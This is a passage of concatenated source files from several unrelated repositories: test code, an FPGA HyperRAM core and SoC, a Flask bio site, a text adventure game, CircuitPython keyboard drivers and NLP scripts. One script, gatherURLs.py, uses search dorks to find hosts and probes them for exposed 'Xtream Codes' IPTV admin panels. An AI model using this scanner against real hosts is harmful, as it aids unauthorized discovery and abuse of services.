def _get_records(s3_notification):
n = S3Notification(s3_notification)
records = []
for e in n.events:
records += e.datalake_records
return records
@freeze_time('1977-07-01T03:01:00Z')
def test_s3_notifications(event_test_driver):
def tester(event):
if 's3_notification_exception' in event:
exception = _import_exception(event['s3_notification_exception'])
with pytest.raises(exception):
_get_records(event['s3_notification'])
else:
records = _get_records(event['s3_notification'])
assert records == event['expected_datalake_records']
event_test_driver(tester)
```
#### File: ingester/tests/test_storage.py
```python
from datalake_ingester import DynamoDBStorage
def test_dynamodb_store(dynamodb_users_table, dynamodb_connection):
storage = DynamoDBStorage('users', connection=dynamodb_connection)
expected_user = {'name': 'John', 'last_name': 'Muir'}
storage.store(expected_user)
user = dict(dynamodb_users_table.get_item(name='John', last_name='Muir'))
assert dict(user) == expected_user
def test_store_duplicate(dynamodb_users_table, dynamodb_connection):
storage = DynamoDBStorage('users', connection=dynamodb_connection)
expected_user = {'name': 'Vanilla', 'last_name': 'Ice'}
storage.store(expected_user)
storage.store(expected_user)
user = dict(dynamodb_users_table.get_item(name='Vanilla', last_name='Ice'))
assert dict(user) == expected_user
``` |
{
"source": "JP-Clemente/Programming_Projects",
"score": 3
} |
#### File: Programming_Projects/A*_8_Puzzle/Posicao.py
```python
class Posicao:
def __init__(self, l, c):
self.linha = l
self.coluna = c
def getLinha(self):
return self.linha
def setLinha(self, linha):
self.linha = linha
def getColuna(self):
return self.coluna
def setColuna(self, coluna):
        self.coluna = coluna
``` |
{
"source": "jpc-lip6/mpw4",
"score": 2
} |
#### File: mpw4/cores/hyperram.py
```python
from amaranth import *
from thirdparty.amaranth_soc import wishbone
from thirdparty.amaranth_soc.memory import MemoryMap
from thirdparty.lambdasoc.periph import Peripheral
# for Migen compat
def timeline(m, trigger, events):
lastevent = max([e[0] for e in events])
counter = Signal(range(lastevent+1))
# insert counter reset if it doesn't naturally overflow
# (test if lastevent+1 is a power of 2)
with m.If(((lastevent & (lastevent + 1)) != 0) & (counter == lastevent)):
m.d.sync += counter.eq(0)
with m.Elif(counter != 0):
m.d.sync += counter.eq(counter + 1)
with m.Elif(trigger):
m.d.sync += counter.eq(1)
def get_cond(e):
if e[0] == 0:
return trigger & (counter == 0)
else:
return counter == e[0]
for ev in events:
with m.If(get_cond(ev)):
m.d.sync += ev[1]
# HyperRAM -----------------------------------------------------------------------------------------
class HyperRAM(Peripheral, Elaboratable):
"""HyperRAM
Provides a very simple/minimal HyperRAM core that should work with all FPGA/HyperRam chips:
- FPGA vendor agnostic.
- no setup/chip configuration (use default latency).
This core favors portability and ease of use over performance.
"""
def __init__(self, *, io):
super().__init__()
self.io = io
self.bus = wishbone.Interface(addr_width=21,
data_width=32, granularity=8)
map = MemoryMap(addr_width=23, data_width=8)
map.add_resource("hyperram", size=2**23)
self.bus.memory_map = map
self.size = 2**23
# # #
def elaborate(self, platform):
m = Module()
clk = Signal()
clk_phase = Signal(2)
cs = Signal()
ca = Signal(48)
sr = Signal(48)
dq_o = Signal(8)
dq_i = Signal(8)
dq_oe = Signal()
rwds_o = self.io["rwds_o"]
rwds_oe = Signal()
m.d.comb += [
self.io["csn_o"].eq(~cs),
self.io["csn_oeb"].eq(0),
self.io["clk_o"].eq(clk),
self.io["clk_oeb"].eq(0),
self.io["rwds_oeb"].eq(~rwds_oe),
]
for i in range(8):
m.d.comb += [
self.io[f"d{i}_o"].eq(dq_o[i]),
self.io[f"d{i}_oeb"].eq(~dq_oe),
dq_i[i].eq(self.io[f"d{i}_i"])
]
# Clock Generation (sys_clk/4) -------------------------------------------------------------
m.d.sync += clk_phase.eq(clk_phase + 1)
with m.Switch(clk_phase):
with m.Case(1):
m.d.sync += clk.eq(cs)
with m.Case(3):
m.d.sync += clk.eq(0)
# Data Shift Register (for write and read) -------------------------------------------------
dqi = Signal(8)
m.d.sync += dqi.eq(dq_i) # Sample on 90° and 270°
with m.Switch(clk_phase):
with m.Case(0, 2):
m.d.sync += sr.eq(Cat(dqi, sr[:-8]))
m.d.comb += [
            self.bus.dat_r.eq(sr), # To Wishbone
dq_o.eq(sr[-8:]), # To HyperRAM
]
# Command generation -----------------------------------------------------------------------
m.d.comb += [
ca[47].eq(~self.bus.we), # R/W#
ca[45].eq(1), # Burst Type (Linear)
ca[16:35].eq(self.bus.adr[2:21]), # Row & Upper Column Address
ca[1:3].eq(self.bus.adr[0:2]), # Lower Column Address
ca[0].eq(0), # Lower Column Address
]
# Sequencer --------------------------------------------------------------------------------
dt_seq = [
# DT, Action
(3, []),
(12, [cs.eq(1), dq_oe.eq(1), sr.eq(ca)]), # Command: 6 clk
(44, [dq_oe.eq(0)]), # Latency(default): 2*6 clk
(2, [dq_oe.eq(self.bus.we), # Write/Read data byte: 2 clk
sr[:16].eq(0),
sr[16:].eq(self.bus.dat_w),
rwds_oe.eq(self.bus.we),
rwds_o.eq(~self.bus.sel[3])]),
(2, [rwds_o.eq(~self.bus.sel[2])]), # Write/Read data byte: 2 clk
(2, [rwds_o.eq(~self.bus.sel[1])]), # Write/Read data byte: 2 clk
(2, [rwds_o.eq(~self.bus.sel[0])]), # Write/Read data byte: 2 clk
(2, [cs.eq(0), rwds_oe.eq(0), dq_oe.eq(0)]),
(1, [self.bus.ack.eq(1)]),
(1, [self.bus.ack.eq(0)]),
(0, []),
]
# Convert delta-time sequencer to time sequencer
t_seq = []
t_seq_start = (clk_phase == 1)
t = 0
for dt, a in dt_seq:
t_seq.append((t, a))
t += dt
timeline(m, self.bus.cyc & self.bus.stb & t_seq_start, t_seq)
return m
    # Note: leftover from the Migen version of this core. TSTriple and
    # self.specials are Migen constructs with no Amaranth equivalent here,
    # and this helper is not used by elaborate() above.
    def add_tristate(self, pad):
        t = TSTriple(len(pad))
        self.specials += t.get_tristate(pad)
        return t
```
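The `timeline` helper at the top of this file drives the whole access sequence: it takes absolute clock-cycle offsets, which is why `elaborate()` first converts the delta-time list `dt_seq` into cumulative times. The sketch below shows the same pattern on its own with a made-up pulse-stretcher; the import path follows the repo layout used by `soc/test_soc.py`.
```python
# Illustrative use of the timeline() helper defined above: after a trigger,
# wait two cycles, assert a flag for three cycles, then drop it. This module
# is made up for illustration and is not part of the core.
from amaranth import Elaboratable, Module, Signal
from cores.hyperram import timeline


class PulseStretcher(Elaboratable):
    def __init__(self):
        self.trigger = Signal()
        self.flag = Signal()

    def elaborate(self, platform):
        m = Module()
        dt_seq = [
            (2, []),                 # wait 2 cycles after the trigger
            (3, [self.flag.eq(1)]),  # assert flag, hold it for 3 cycles
            (0, [self.flag.eq(0)]),  # then deassert it
        ]
        # Convert delta times to absolute times, as HyperRAM.elaborate() does.
        t_seq, t = [], 0
        for dt, actions in dt_seq:
            t_seq.append((t, actions))
            t += dt
        timeline(m, self.trigger, t_seq)
        return m
```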
#### File: mpw4/soc/test_soc.py
```python
import argparse
import importlib
from amaranth import *
from thirdparty.amaranth_soc import wishbone
from thirdparty.lambdasoc.cpu.minerva import MinervaCPU
from thirdparty.lambdasoc.periph.intc import GenericInterruptController
from thirdparty.lambdasoc.periph.serial import AsyncSerialPeripheral
from thirdparty.lambdasoc.periph.sram import SRAMPeripheral
from thirdparty.lambdasoc.periph.timer import TimerPeripheral
from thirdparty.lambdasoc.soc.cpu import CPUSoC
from cores.gpio import GPIOPeripheral
from cores.spimemio_wrapper import SPIMemIO
from cores.hyperram import HyperRAM
class HyperRamSoC(CPUSoC, Elaboratable):
def __init__(self, *, small, reset_addr, clk_freq,
rom_addr, flash_ctrl_addr, flash_pins,
hram_addr, hyperram_pins,
sram_addr, sram_size,
uart_addr, uart_divisor, uart_pins,
timer_addr, timer_width,
gpio_addr, gpio_count, gpio_pins):
self._arbiter = wishbone.Arbiter(addr_width=30, data_width=32, granularity=8)
self._decoder = wishbone.Decoder(addr_width=30, data_width=32, granularity=8)
self.cpu = MinervaCPU(reset_address=reset_addr, with_muldiv=(not small))
self._arbiter.add(self.cpu.ibus)
self._arbiter.add(self.cpu.dbus)
self.rom = SPIMemIO(flash=flash_pins)
self._decoder.add(self.rom.data_bus, addr=rom_addr)
self._decoder.add(self.rom.ctrl_bus, addr=flash_ctrl_addr)
self.ram = SRAMPeripheral(size=sram_size)
self._decoder.add(self.ram.bus, addr=sram_addr)
self.hyperram = HyperRAM(io=hyperram_pins)
self._decoder.add(self.hyperram.bus, addr=hram_addr)
self.uart = AsyncSerialPeripheral(divisor=uart_divisor, pins=uart_pins, rx_depth=4, tx_depth=4)
self._decoder.add(self.uart.bus, addr=uart_addr)
self.timer = TimerPeripheral(width=timer_width)
self._decoder.add(self.timer.bus, addr=timer_addr)
self.intc = GenericInterruptController(width=len(self.cpu.ip))
self.intc.add_irq(self.timer.irq, 0)
self.intc.add_irq(self.uart .irq, 1)
self.gpio = GPIOPeripheral(gpio_count, gpio_pins)
self._decoder.add(self.gpio.bus, addr=gpio_addr)
self.memory_map = self._decoder.bus.memory_map
self.clk_freq = clk_freq
def elaborate(self, platform):
m = Module()
m.submodules.arbiter = self._arbiter
m.submodules.cpu = self.cpu
m.submodules.decoder = self._decoder
m.submodules.rom = self.rom
m.submodules.ram = self.ram
m.submodules.hyperram = self.hyperram
m.submodules.uart = self.uart
m.submodules.timer = self.timer
m.submodules.gpio = self.gpio
m.submodules.intc = self.intc
m.d.comb += [
self._arbiter.bus.connect(self._decoder.bus),
self.cpu.ip.eq(self.intc.ip),
]
return m
def parse_pinout():
result = {}
import pathlib
with open(pathlib.Path(__file__).parent / "pinout_plan.txt", "r") as f:
for line in f:
sl = [x for x in line.strip().split(' ') if x]
if len(sl) != 2: continue
result[sl[1]] = int(sl[0])
return result
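# parse_pinout() expects pinout_plan.txt to hold one "<io index> <pin name>"
# pair per line, for example (illustrative values, not the real plan):
#     0 clk
#     1 rstn
#     2 uart_tx
# which would yield {"clk": 0, "rstn": 1, "uart_tx": 2}.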
# Create a pretend UART resource with arbitrary signals
class UARTPins():
class Input():
def __init__(self, sig):
self.i = sig
class Output():
def __init__(self, sig):
self.o = sig
def __init__(self, rx, tx):
self.rx = UARTPins.Input(rx)
self.tx = UARTPins.Output(tx)
class SoCWrapper(Elaboratable):
def __init__(self, build_dir="build", small=False, with_bios=True):
io_count = 38
self.build_dir = build_dir
self.small = small
self.with_bios = with_bios
self.io_in = Signal(io_count)
self.io_out = Signal(io_count)
self.io_oeb = Signal(io_count)
self.pinout = parse_pinout()
def i(self, name): return self.io_in[self.pinout[name]]
def o(self, name): return self.io_out[self.pinout[name]]
def oeb(self, name): return self.io_oeb[self.pinout[name]]
def elaborate(self, platform):
m = Module()
# Gets i, o, oeb in a dict for all pins starting with a prefix
def resource_pins(resource):
result = {}
for pin, bit in self.pinout.items():
if pin.startswith(resource):
bit_name = pin[len(resource):]
result[f"{bit_name}_i"] = Signal()
result[f"{bit_name}_o"] = Signal()
result[f"{bit_name}_oeb"] = Signal()
m.d.comb += [
self.io_out[bit].eq(result[f"{bit_name}_o"]),
self.io_oeb[bit].eq(result[f"{bit_name}_oeb"]),
result[f"{bit_name}_i"].eq(self.io_in[bit]),
]
return result
# Clock input
m.domains.sync = ClockDomain(async_reset=False)
m.d.comb += ClockSignal().eq(self.i("clk"))
# Reset synchroniser
rst = Signal()
m.d.comb += rst.eq(~self.i("rstn"))
rst_sync0 = Signal(reset_less=True)
rst_sync1 = Signal(reset_less=True)
m.d.sync += [
rst_sync0.eq(rst),
rst_sync1.eq(rst_sync0),
]
m.d.comb += [
ResetSignal().eq(rst_sync1),
self.o("rst_inv_out").eq(rst), # mirror to some pins for debugging
self.o("rst_sync_out").eq(rst_sync1),
]
uart_pins = UARTPins(rx=self.i("uart_rx"), tx=self.o("uart_tx"))
# The SoC itself
m.submodules.soc = HyperRamSoC(
reset_addr=0x00100000, clk_freq=int(27e6), small=self.small,
rom_addr=0x00000000, flash_ctrl_addr=0x10007000, flash_pins=resource_pins("flash_"),
hram_addr=0x20000000, hyperram_pins=resource_pins("ram_"),
sram_addr=0x10004000, sram_size=(0x40 if self.small else 0x200),
uart_addr=0x10005000, uart_divisor=int(27e6 // 9600), uart_pins=uart_pins,
timer_addr=0x10006000, timer_width=32,
gpio_addr=0x10008000, gpio_count=8, gpio_pins=resource_pins("gpio_"),
)
if self.with_bios:
m.submodules.soc.build(build_dir=f"{self.build_dir}/soc", do_init=True)
# Heartbeat counter so we can confirm basic logic works
hb_ctr = Signal(24)
m.d.sync += hb_ctr.eq(hb_ctr + 1)
m.d.comb += [
self.o("heartbeat_0").eq(hb_ctr[0]),
self.o("heartbeat_1").eq(hb_ctr[23]),
]
# Remaining pins
for pin, bit in self.pinout.items():
if pin in ("clk", "rstn", "uart_rx") or pin.startswith("unalloc_"): # inputs and TODOs
m.d.comb += [
self.io_oeb[bit].eq(1),
self.io_out[bit].eq(0),
]
elif pin.startswith("heartbeat") or pin in ("rst_inv_out", "rst_sync_out", "uart_tx"): # outputs
m.d.comb += [
self.io_oeb[bit].eq(0),
]
return m
if __name__ == "__main__":
wrapper = SoCWrapper()
from amaranth.cli import main
main(wrapper, name="soc_wrapper", ports=[wrapper.io_in, wrapper.io_out, wrapper.io_oeb])
``` |
{
"source": "jpco/bittybio",
"score": 3
} |
#### File: jpco/bittybio/app.py
```python
from flask import Flask, render_template, redirect
import rethinkdb as r
app = Flask(__name__)
@app.route('/')
def main():
return render_template('main.html')
@app.route('/<user>')
def bio(user):
rconn = r.connect('localhost')
useri = r.db('bittybio').table('users').get(user).run(rconn)
rconn.close()
if useri == None:
return 'Sorry! We couldn\'t find '+user+'.'
else:
return render_template('bio.html', **useri)
@app.route('/<user>/edit')
def editbio(user):
rconn = r.connect('localhost')
useri = r.db('bittybio').table('users').get(user).run(rconn)
rconn.close()
if useri == None:
return 'Sorry! We couldn\'t find '+user+'.'
else:
return render_template('edit.html', **useri)
@app.route('/<user>/bb')
def touser(user):
return redirect(user)
@app.route('/<user>/<net>')
def usersnet(user, net):
rconn = r.connect('localhost')
userdata = r.db('bittybio').table('users').get(user).run(rconn)
    netdata = r.db('bittybio').table('nets').get(net).run(rconn)
    rconn.close()
    if userdata == None or netdata == None:
return 'User or network undefined!'
goto_name = []
for dnet in userdata['nets']:
if dnet['net'] == net:
goto_name.append(dnet['url'])
try:
url = netdata['user_url']
except KeyError:
url = netdata['url']
    if not goto_name:
        return 'Sorry! We couldn\'t find a '+net+' link for '+user+'.'
    elif len(goto_name) > 1:
        return "Multiple potential URLs found."
    elif netdata['prefix']:
        return redirect('http://'+goto_name[0]+'.'+url)
    else:
        return redirect('http://'+url+goto_name[0])
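# Hedged sketch of the document shapes this app assumes in RethinkDB (field names are taken
# from the lookups above; get() uses the username / network name as the primary key, and the
# real records may carry extra fields used by the templates):
#   users: {"nets": [{"net": "twitter", "url": "janedoe"}], ...}
#   nets:  {"url": "twitter.com/", "user_url": "...", "prefix": False, ...}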
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80, debug=True)
``` |
{
"source": "JPCodaLot/textadventure",
"score": 4
} |
#### File: JPCodaLot/textadventure/main.py
```python
import json # Used to parse the map.json file
import time # Used to add wait time during printing
from termcolor import cprint # Used to print in different colors
# Load the map file
m = json.loads(open("map.json").read())
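# Hypothetical map.json skeleton, inferred from the keys read below (the real file ships with
# the repo and may contain more rooms and fields):
# {
#   "title": "...", "author": "...", "rules": "...",
#   "start": 0, "finish": 1, "inventory": [],
#   "items": {"Key": "A small brass key."},
#   "rooms": [
#     {"name": "Hall", "description": "...", "exits": {"n": 1},
#      "item": "Key", "require": ["Key"], "clue": "The door is locked."}
#   ]
# }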
inventory = []
# Defining print room function
def gotoRoom(number):
# Get the room from it's number
room = m["rooms"][number]
# Tell about the room
cprint(room["name"],"blue")
print(room["description"]+"\n")
time.sleep(1)
# Quit the game if finished
if number == m["finish"]:
quit()
# Show the inventory
cprint("Inventory:"+str(m["inventory"])+"\n", "yellow")
# Display the menu
while True:
# Wait one second
time.sleep(1)
# Ask the user how they would like to continue
print("What would you like to do? \nHint: Enter the first letter of the corresponding with the action you would like to make")
if "item" in room:
print("- Look around")
if "n" in room["exits"]:
print("- North")
if "s" in room["exits"]:
print("- South")
if "w" in room["exits"]:
print("- West")
if "e" in room["exits"]:
print("- East")
print() # Print blank newline
UserChoice = input().lower()
# Defining walk to room function
def walk(direction):
print("You have chosen to walk " + direction + "...\n")
if UserChoice in room["exits"]:
nextRoom = m["rooms"][room["exits"][UserChoice]]
                # Check if all the required items are in the inventory
if "require" in nextRoom:
if set(nextRoom["require"]).issubset(set(m["inventory"])):
gotoRoom(room["exits"][UserChoice])
else:
cprint(nextRoom["clue"]+"\n","red")
else:
gotoRoom(room["exits"][UserChoice])
else:
cprint("You cannot walk " + direction + ", there is a wall blocking your way.\n", "red")
# Look around
if UserChoice == "l":
print("You have chosen to look around...")
if "item" in room:
if room["item"] in m["inventory"]:
print("You have already looked through this room.\n")
else:
print(m["items"][room["item"]]+"\n")
time.sleep(1)
cprint(room["item"] + " added to your inventory.\n", "yellow")
m["inventory"].append(room["item"])
else:
print("You found nothing of value.\n")
# Walk in direction
elif UserChoice == "n":
walk("north")
elif UserChoice == "s":
walk("south")
elif UserChoice == "w":
walk("west")
elif UserChoice == "e":
walk("east")
# Invalid answer
else:
cprint("Please select a valid answer.", "red")
# Print the title and rules
cprint(m["title"]+" by "+m["author"]+"\n","green")
cprint(m["rules"]+"\n","green")
# Start the game on enter
print("Press enter to start")
input()
gotoRoom(m["start"])
``` |
{
"source": "jpcompgr123/iptv",
"score": 3
} |
#### File: jpcompgr123/iptv/gatherURLs.py
```python
try:
from requests import get
from urlparse import urlparse
from duckduckgo import search
from sys import argv
except ImportError as e:
print str(e)
def extractUrls(dorks):
temp = []
for dork in open(dorks, "r").readlines():
for link in search(dork.strip(), max_results=400):
if link not in temp:
temp.append(link)
return temp
def checkUrls(urls):
temp = []
for url in urls:
url = urlparse(url.strip())[1]
if url not in temp:
temp.append(url)
print "[i] Found %s in total." % (len(temp))
return temp
def aliveOrNot(urls):
temp = []
print "[*] Hunting URLs for Admin panel"
for url in urls:
try:
if "Xtream Codes</a>" in get("http://%s/" % (url), timeout=10).text:
print "\t{%s} Panel found on URL -->> http://%s/" % (len(temp+1),url)
temp.append(url)
except Exception as e:
# print "\tNo Panel found -->> http://%s/" %(url)
pass
print "[i] %s of them are alive!" % (len(temp))
f = open("urls.txt", "a+")
for url in temp:
f.write("http://%s/\n" %(url))
f.close()
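# Assumed invocation (argv[1] is the dorks file, one search dork per line):
#   python gatherURLs.py dorks.txt
# Hosts whose pages mention "Xtream Codes" are appended to urls.txt as http://<host>/ lines.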
if __name__ == '__main__':
try:
dorks = argv[1]
aliveOrNot(checkUrls(extractUrls(dorks)))
except Exception as e:
print "Error\n%s" % (str(e))
``` |
{
"source": "jpconstantineau/CircuitPython_pykey",
"score": 3
} |
#### File: CircuitPython_pykey/pykey/BitmapKeyboard.py
```python
from adafruit_hid.keyboard import Keyboard, find_device
from adafruit_hid.keycode import Keycode
class BitmapKeyboard(Keyboard):
"""
Module representing a NKRO Keyboard
"""
def __init__(self, devices):
device = find_device(devices, usage_page=0x1, usage=0x6)
try:
device.send_report(b"\0" * 16)
except ValueError:
print(
"found keyboard, but it did not accept a 16-byte report. "
+ "check that boot.py is installed properly"
)
self._keyboard_device = device
# report[0] modifiers
# report[1:16] regular key presses bitmask
self.report = bytearray(16)
self.report_modifier = memoryview(self.report)[0:1]
self.report_bitmap = memoryview(self.report)[1:]
def _add_keycode_to_report(self, keycode):
modifier = Keycode.modifier_bit(keycode)
if modifier:
# Set bit for this modifier.
self.report_modifier[0] |= modifier
else:
self.report_bitmap[keycode >> 3] |= 1 << (keycode & 0x7)
def _remove_keycode_from_report(self, keycode):
modifier = Keycode.modifier_bit(keycode)
if modifier:
# Set bit for this modifier.
self.report_modifier[0] &= ~modifier
else:
self.report_bitmap[keycode >> 3] &= ~(1 << (keycode & 0x7))
def release_all(self):
"""
Module representing a NKRO Keyboard
"""
for i in range(len(self.report)):
self.report[i] = 0
self._keyboard_device.send_report(self.report)
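# Hedged usage sketch (assumes a boot.py that enables the 16-byte NKRO HID report, as the
# error message above suggests):
#   import usb_hid
#   from adafruit_hid.keycode import Keycode
#   kbd = BitmapKeyboard(usb_hid.devices)
#   kbd.press(Keycode.A, Keycode.B)   # press/release are inherited from the Keyboard base class
#   kbd.release_all()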
```
#### File: CircuitPython_pykey/pykey/__init__.py
```python
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/jpconstantineau/CircuitPython_pykey.git"
import os
import usb_hid
from adafruit_hid.keyboard import Keyboard
from BitmapKeyboard import BitmapKeyboard
class KB_Hardware:
"""
Class representing a keyboard Hardware without the specifics...
"""
def __init__(self, nkro: bool = False):
self._board_type = os.uname().machine
self._keyboard = None
self._pixels = None
self._leds = None
self._speaker = None
self._encoder = None
self._keys = None
self._nkro = nkro
self._key_to_position = None
self._position_to_key = None
@property
def key_to_position(self):
"""
Module representing a keyboard procesing loop..
"""
return self._key_to_position
@property
def position_to_key(self):
"""
Module representing a keyboard procesing loop..
"""
return self._position_to_key
@property
def keys(self):
"""
The keys on the MacroPad. Uses events to track key number and state, e.g. pressed or
released. You must fetch the events using ``keys.events.get()`` and then the events are
available for usage in your code. Each event has three properties:
* ``key_number``: the number of the key that changed. Keys are numbered starting at 0.
* ``pressed``: ``True`` if the event is a transition from released to pressed.
* ``released``: ``True`` if the event is a transition from pressed to released.
``released`` is always the opposite of ``pressed``; it's provided
for convenience and clarity, in case you want to test for
key-release events explicitly.
The following example prints the key press and release events to the serial console.
.. code-block:: python
from adafruit_macropad import MacroPad
macropad = MacroPad()
while True:
key_event = macropad.keys.events.get()
if key_event:
print(key_event)
"""
return self._keys
@property
def encoder(self):
"""
The rotary encoder relative rotation position. Always begins at 0 when the code is run, so
the value returned is relative to the initial location.
The following example prints the relative position to the serial console.
.. code-block:: python
from adafruit_macropad import MacroPad
macropad = MacroPad()
while True:
print(macropad.encoder)
"""
return self._encoder.position
@property
def speaker(self):
"""
Module representing a keyboard procesing loop..
"""
return self._speaker
@property
def leds(self):
"""
Module representing a keyboard procesing loop..
"""
return self._leds
@property
def pixels(self):
"""Sequence-like object representing the twelve NeoPixel LEDs in a 3 x 4 grid on the
MacroPad. Each pixel is at a certain index in the sequence, numbered 0-11. Colors can be an
RGB tuple like (255, 0, 0) where (R, G, B), or an RGB hex value like 0xFF0000 for red where
each two digits are a color (0xRRGGBB). Set the global brightness using any number from 0
to 1 to represent a percentage, i.e. 0.3 sets global brightness to 30%. Brightness defaults
to 1.
See ``neopixel.NeoPixel`` for more info.
The following example turns all the pixels green at 50% brightness.
.. code-block:: python
from adafruit_macropad import MacroPad
macropad = MacroPad()
macropad.pixels.brightness = 0.5
while True:
macropad.pixels.fill((0, 255, 0))
The following example sets the first pixel red and the twelfth pixel blue.
.. code-block:: python
from adafruit_macropad import MacroPad
macropad = MacroPad()
while True:
macropad.pixels[0] = (255, 0, 0)
macropad.pixels[11] = (0, 0, 255)
"""
return self._pixels
@property
def keyboard(self):
"""
A keyboard object used to send HID reports. For details, see the ``Keyboard`` documentation
in CircuitPython HID: https://circuitpython.readthedocs.io/projects/hid/en/latest/index.html
The following example types out the letter "a" when the rotary encoder switch is pressed.
.. code-block:: python
from adafruit_macropad import MacroPad
macropad = MacroPad()
while True:
if macropad.encoder_switch:
macropad.keyboard.send(macropad.Keycode.A)
"""
if self._keyboard is None:
if self._nkro is True:
self._keyboard = BitmapKeyboard(usb_hid.devices)
else:
self._keyboard = Keyboard(usb_hid.devices)
return self._keyboard
```
#### File: CircuitPython_pykey/pykey/ledmatrix.py
```python
from digitalio import DigitalInOut, Direction
class KB_LEDMatrix:
"""
Class Docstring
"""
# LEDMatrix(row_pins: Sequence[microcontroller.Pin],
# column_pins: Sequence[microcontroller.Pin], columns_to_anodes: bool = True)
def __init__(self, row_pins, column_pins, columns_to_anodes: bool = True):
"""
docstring
"""
self.row_pins = row_pins
self.column_pins = column_pins
self.columns_to_anodes = columns_to_anodes
self.column_io = []
self.row_io = []
for col_p in self.column_pins:
self.column_io.append(DigitalInOut(col_p))
for row_p in self.row_pins:
self.row_io.append(DigitalInOut(row_p))
def reset_leds(self):
"""
docstring
"""
for pin in self.row_io:
pin.direction = Direction.OUTPUT
pin.value = False
for pin in self.column_io:
pin.direction = Direction.OUTPUT
pin.value = False
def led_ON(self, led_number): # pylint: disable=invalid-name
"""
doctrsing
"""
self.reset_leds()
colcount = len(self.column_io)
colIO_LED = self.column_io[0] # pylint: disable=invalid-name
rowIO_LED = self.row_io[0] # pylint: disable=invalid-name
for rownum, row_pin in enumerate(self.row_io):
for colnum, col_pin in enumerate(self.column_io):
if led_number == (rownum * colcount + colnum):
colIO_LED = col_pin # pylint: disable=invalid-name
rowIO_LED = row_pin # pylint: disable=invalid-name
if self.columns_to_anodes:
col_pin.value = False
row_pin.value = True
else:
col_pin.value = True
row_pin.value = False
if self.columns_to_anodes:
colIO_LED.value = True
rowIO_LED.value = False
else:
colIO_LED.value = False
rowIO_LED.value = True
def led_OFF(self): # pylint: disable=invalid-name
"""
docstrings
"""
self.reset_leds()
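# Illustrative numbering (assumption based on led_ON above): with 2 row pins and 3 column pins,
# led_number = row * 3 + column, so index 4 maps to row 1, column 1. Pin names below are
# placeholders:
#   matrix = KB_LEDMatrix(row_pins=[board.GP0, board.GP1],
#                         column_pins=[board.GP2, board.GP3, board.GP4])
#   matrix.led_ON(4)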
``` |
{
"source": "jpconsuegra/compilers-uh",
"score": 3
} |
#### File: compilers-uh/source/base.py
```python
import pydot
import os
class Globals:
images = 0
class Graph:
def _image_name(self):
Globals.images += 1
filename = os.getenv('FILENAME')
filename = os.path.basename(filename).split(".")[0]
return f"image-{filename}-{Globals.images}"
def print(self, label="", caption="", float=True, width="50%"):
if not label:
label = self._image_name()
fname = f"build/graphics/{label}.svg"
self.graph().write_svg(fname)
output = f"{{ #{label} width={width} }}"
if not float:
output += "\\"
print(output)
def _repr_svg_(self):
return self.graph().create_svg().decode('utf8')
def graph(self) -> pydot.Graph:
raise NotImplementedError()
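# Hedged usage sketch: subclasses override graph() to return a pydot graph, and print() is
# called from a build script that sets the FILENAME environment variable and creates the
# build/graphics/ output directory:
#   class MyGraph(Graph):
#       def graph(self):
#           g = pydot.Dot(graph_type="digraph")
#           g.add_edge(pydot.Edge("S", "A"))
#           return g
#   MyGraph().print(width="40%")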
``` |
{
"source": "jpconsuegra/ehealthkd-2020",
"score": 3
} |
#### File: ehealthkd-2020/scripts/legacy.py
```python
import bisect
import warnings
from pathlib import Path
from scripts.utils import Collection, Keyphrase, Relation, Sentence
warnings.warn(
"""The `script.legacy` module is deprecated!
Consider using `CollectionV1Handler` from `scripts.utils` instead."""
)
class eHealth2019:
@classmethod
def load_input(cls, collection: Collection, finput: Path):
sentences = [s.strip() for s in finput.open(encoding="utf8").readlines() if s]
sentences_obj = [Sentence(text) for text in sentences]
collection.sentences.extend(sentences_obj)
@classmethod
def load_keyphrases(cls, collection: Collection, finput: Path):
cls.load_input(collection, finput)
input_a_file = finput.parent / ("output_a_" + finput.name.split("_")[1])
sentences_length = [len(s.text) for s in collection.sentences]
for i in range(1, len(sentences_length)):
sentences_length[i] += sentences_length[i - 1] + 1
sentence_by_id = {}
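        # Assumed line format of the output_a_* file, inferred from the parsing below
        # (tab-separated; the last field is ignored here):
        #   <id>\t<start end[;start end...]>\t<label>\t<text>
        # e.g. "12\t10 18;25 31\tConcept\t..."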
for line in input_a_file.open(encoding="utf8").readlines():
lid, spans, label, _ = line.strip().split("\t")
lid = int(lid)
spans = [s.split() for s in spans.split(";")]
spans = [(int(start), int(end)) for start, end in spans]
# find the sentence where this annotation is
i = bisect.bisect(sentences_length, spans[0][0])
# correct the annotation spans
if i > 0:
spans = [
(
start - sentences_length[i - 1] - 1,
end - sentences_length[i - 1] - 1,
)
for start, end in spans
]
spans.sort(key=lambda t: t[0])
# store the annotation in the corresponding sentence
the_sentence = collection.sentences[i]
keyphrase = Keyphrase(the_sentence, label, lid, spans)
the_sentence.keyphrases.append(keyphrase)
if len(keyphrase.spans) == 1:
keyphrase.split()
sentence_by_id[lid] = the_sentence
return sentence_by_id
@classmethod
def load(cls, collection: Collection, finput: Path):
input_b_file = finput.parent / ("output_b_" + finput.name.split("_")[1])
sentence_by_id = cls.load_keyphrases(collection, finput)
for line in input_b_file.open(encoding="utf8").readlines():
label, src, dst = line.strip().split("\t")
src, dst = int(src), int(dst)
the_sentence = sentence_by_id[src]
if the_sentence != sentence_by_id[dst]:
warnings.warn(
"In file '%s' relation '%s' between %i and %i crosses sentence boundaries and has been ignored."
% (finput, label, src, dst)
)
continue
assert sentence_by_id[dst] == the_sentence
the_sentence.relations.append(
Relation(the_sentence, src, dst, label.lower())
)
return collection
```
#### File: ehealthkd-2020/src/ehealth20.py
```python
import os
import warnings
from typing import Dict
import torch
import torch.nn as nn
import torch.optim as optim
from kdtools.datasets import (
BILUOVSentencesDS,
DependencyTreeDS,
FocusOnEntityDS,
SelectedDS,
from_biluov,
match_tokens_to_entities,
to_biluov,
)
from kdtools.encoders import SequenceCharEncoder
from kdtools.layers import CharEmbeddingEncoder
from kdtools.models import (
AttentionSequenceTagger,
BasicSequenceClassifier,
BasicSequenceTagger,
BertBasedSequenceClassifier,
BertBasedSequenceTagger,
PairClassifier,
)
from kdtools.nlp import BertNLP, get_nlp
from kdtools.utils import (
jointly_train_on_shallow_dataloader,
train_on_shallow_dataloader,
)
from tqdm import tqdm
from scripts.submit import Algorithm, Run, handle_args
from scripts.utils import ENTITIES, RELATIONS, Collection, Keyphrase, Relation
TAXONOMIC_RELS = [
"is-a",
"same-as",
"part-of",
"has-property",
"causes",
"entails",
]
CONTEXT_RELS = [
"in-context",
"in-place",
"in-time",
"subject",
"target",
"domain",
"arg",
]
